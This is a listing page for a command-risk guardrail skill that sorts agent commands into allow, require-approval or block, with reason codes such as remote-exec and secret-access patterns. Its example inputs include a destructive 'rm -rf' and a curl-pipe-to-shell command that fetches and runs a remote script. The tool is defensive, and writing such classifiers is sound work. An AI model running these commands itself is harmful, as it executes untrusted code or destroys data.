DeepInspect Guardrails

v1.0.0

Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.

0· 590· 1 versions· 0 current· 0 all-time· Updated 10h ago· MIT-0

by@parmindersk

Security Scans

VirusTotalBenign ClawScanBenign Static analysisBenign

Install

openclaw skills install deepinspect-openclaw-guardrails

OpenClaw Guardrails (MVP)

DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.

What it does (MVP)

Classifies requested command risk
Returns allow, require_approval, or block
Emits reason codes for explainability
Uses a baseline balanced profile in policy.baseline.json

Decision outputs

allow
require_approval
block

Reason codes (examples)

REMOTE_EXEC_PATTERN
DESTRUCTIVE_PATTERN
PRIVILEGE_ESCALATION_PATTERN
SYSTEM_MUTATION_PATTERN
SECRET_ACCESS_PATTERN
OUTSIDE_WORKSPACE_PATH

Local usage

node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"

Run tests

node skills/openclaw/guardrails/tests/decide.test.js

How to tune policy

Edit:

workspaceRoots
allowlistedDomains
highRiskPatterns
actions

in policy.baseline.json.

Version tags

latestvk970wxvjvmbc9494c7jkqjhdv181a022